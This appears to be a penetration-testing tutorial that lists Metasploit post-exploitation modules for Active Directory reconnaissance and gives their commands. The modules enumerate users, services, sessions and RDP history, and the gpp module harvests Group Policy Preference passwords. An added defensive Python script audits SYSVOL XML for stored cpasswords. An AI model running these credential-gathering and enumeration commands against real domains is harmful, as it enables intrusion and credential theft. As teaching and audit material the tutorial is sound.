
Penetration Testing in Active Directory using Metasploit (Part 2)

Enumerate all logged on users

This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users

msf post(enum_logged_on_users) > set session 1

msf post(enum_logged_on_users) > exploit

Gather All Group Policy Preferences

This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft's public AES key. Cached Group Policy files may persist if the group policy object is deleted rather than unlinked. Tested on a WinXP SP3 client and a Win2k8 R2 DC.

msf > use post/windows/gather/credentials/gpp

msf post(gpp) > set session 1

msf post(gpp) > exploit
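The weakness the gpp module exploits is a cpassword attribute left inside Preference XML files (Groups.xml, Drives.xml, Services.xml and similar) under SYSVOL. The audit script below is an added example, not code from the original post or from the Metasploit module: it walks preference XML content, reports every element that still carries a non-empty cpassword, and deliberately never decrypts anything, since the defender's job is to find and remove the stale entries. The sample files, their placeholder GUIDs and the cpassword strings are all constructed for the example; a real run would point load_preference_files at a copy of the SYSVOL Policies directory.

```python
"""Audit Group Policy Preference XML for embedded cpassword attributes.

Added example (not part of the original post or of the Metasploit gpp module).
It flags files that still store a credential; it does not decrypt them.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List

# Constructed sample content. GUIDs are placeholders and the cpassword values
# are arbitrary strings, not real GPP ciphertext.
SAMPLE_FILES: Dict[str, str] = {
    "Policies/{PLACEHOLDER-GUID-1}/Machine/Preferences/Groups/Groups.xml": (
        '<Groups>'
        '<User name="localadmin" changed="2015-01-01 00:00:00">'
        '<Properties action="U" userName="localadmin" cpassword="PLACEHOLDERCIPHERTEXT==" />'
        '</User>'
        '</Groups>'
    ),
    # Empty cpassword: the drive map was saved without a stored credential.
    "Policies/{PLACEHOLDER-GUID-2}/User/Preferences/Drives/Drives.xml": (
        '<Drives>'
        '<Drive name="H:" changed="2015-02-02 00:00:00">'
        '<Properties action="U" path="\\\\fileserver\\home" userName="svc_map" cpassword="" />'
        '</Drive>'
        '</Drives>'
    ),
    "Policies/{PLACEHOLDER-GUID-3}/Machine/Preferences/Services/Services.xml": (
        '<NTServices>'
        '<NTService name="Backup" changed="2015-03-03 00:00:00">'
        '<Properties serviceName="Backup" accountName="svc_backup" cpassword="ANOTHERPLACEHOLDER==" />'
        '</NTService>'
        '</NTServices>'
    ),
    # Clean file: the local user is managed, but no password is stored.
    "Policies/{PLACEHOLDER-GUID-4}/Machine/Preferences/Groups/Groups.xml": (
        '<Groups><User name="helpdesk"><Properties action="U" userName="helpdesk" /></User></Groups>'
    ),
}

# Attributes that name the account a stored cpassword belongs to, by preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


@dataclass
class Finding:
    path: str
    element: str   # XML tag carrying the cpassword (User, Drive, NTService, ...)
    account: str   # userName / accountName / runAs attribute if present
    changed: str   # GPP "changed" timestamp; old entries are the usual leftovers


def find_cpasswords(path: str, xml_text: str) -> List[Finding]:
    """Return one Finding per element whose Properties child stores a non-empty cpassword."""
    findings: List[Finding] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # A malformed file is still flagged (via regex) rather than silently skipped.
        if re.search(r'cpassword="[^"]+"', xml_text):
            findings.append(Finding(path, "unparsed", "unknown", "unknown"))
        return findings
    for parent in root.iter():
        for props in parent.findall("Properties"):
            if not props.get("cpassword", ""):
                continue  # empty or absent cpassword means no credential is stored
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "unknown")
            findings.append(Finding(path, parent.tag, account, parent.get("changed", "unknown")))
    return findings


def audit(files: Dict[str, str]) -> List[Finding]:
    """Audit a mapping of relative path -> XML text (as produced by load_preference_files)."""
    findings: List[Finding] = []
    for path, text in files.items():
        findings.extend(find_cpasswords(path, text))
    return findings


def load_preference_files(policies_root: str) -> Dict[str, str]:
    """Collect every *.xml below a Preferences folder under a copy of SYSVOL\\...\\Policies."""
    root = Path(policies_root)
    return {
        str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
        for p in root.rglob("*.xml")
        if "Preferences" in p.parts
    }


if __name__ == "__main__":
    for f in audit(SAMPLE_FILES):
        print(f"{f.path}: <{f.element}> account={f.account} changed={f.changed}")
```

Each reported entry identifies the GPO (by its GUID in the path) and the account whose password is stored, which is exactly what an administrator needs in order to remove the credential from the preference item and rotate the password on the affected accounts.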

Find All DNS Service Records

Enumerates known SRV records for a given domain using the target host's DNS query tool.

msf > use post/multi/gather/dns_srv_lookup

msf post(dns_srv_lookup) > set domain rajlab.com

msf post(dns_srv_lookup) > set session 1

msf post(dns_srv_lookup) > exploit

Find All Services on the Server

This module will query the system for services and display the name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative, and if no query strings are specified, it simply returns all services. NOTE: If the script hangs, Windows Firewall is most likely on and you did not migrate to a safe process (explorer.exe, for example).

msf > use post/windows/gather/enum_services

msf post(enum_services) > set session 1

msf post(enum_services) > exploit

Find All Active Directory TCP sessions

This module lists current TCP sessions.

msf > use post/windows/gather/tcpnetstat

msf post(tcpnetstat) > set session 1

msf post(tcpnetstat) > exploit

Find All Installed Applications on the Server

This module will enumerate all installed applications.

msf > use post/windows/gather/enum_applications

msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit

Find All Remote Desktop Sessions

This module dumps MRU and connection data for RDP sessions.

msf > use post/windows/gather/enum_termserv

msf post(enum_termserv) > set session 1

msf post(enum_termserv) > exploit